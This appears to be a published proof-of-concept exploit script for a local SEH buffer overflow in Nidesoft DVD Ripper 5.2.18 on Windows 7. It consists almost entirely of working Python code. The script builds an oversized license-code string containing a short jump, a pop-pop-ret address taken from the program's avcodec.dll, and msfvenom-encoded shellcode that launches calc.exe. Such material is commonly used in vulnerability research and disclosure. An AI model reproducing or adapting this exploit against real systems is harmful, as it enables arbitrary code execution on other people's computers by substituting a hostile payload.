# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
# Date: 2020-07-26
# Author: Felipe Winsnes
# Software Link: https://nidesoft-dvd-ripper.softonic.com/
# Version: 5.2.18
# Tested on: Windows 7 (x86)

# Blog: https://whitecr0wz.github.io/

# Proof of Concept:
# 1.- Run the python script, it will create the file "poc.txt".
# 2.- Copy the content of the new file "poc.txt" to clipboard
# 3.- Open the application.
# 4.- Paste the clipboard into the "License Code" parameter within registration.
# 5.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"                                                                                                            
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c"
buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55"
buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c"
buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b"
buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55"
buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52"
buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38"
buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42"
buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54"
buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61"
buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77"
buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54"
buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f"
buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30"
buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73"
buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68"
buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30"
buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b"
buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77"
buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a"
buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e"
buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51"
buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30"
buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f"
buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65"
buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45"
buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69"
buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42"
buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71"
buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38"
buf += b"\x53\x55\x65\x50\x41\x41"

nseh = "\xEB\x11\x41\x41"
seh = struct.pack("<I", 0x6678336D) #  0x6678336d : pop ebx # pop esi # ret  | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_WRITECOPY} [avcodec.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Nidesoft Studio\Nidesoft DVD Ripper 5\avcodec.dll)

buffer = "A" * 6008 + nseh + seh + "A" * 11 + buf + "\xff" * 200

f = open ("poc.txt", "w")
f.write(buffer)
f.close()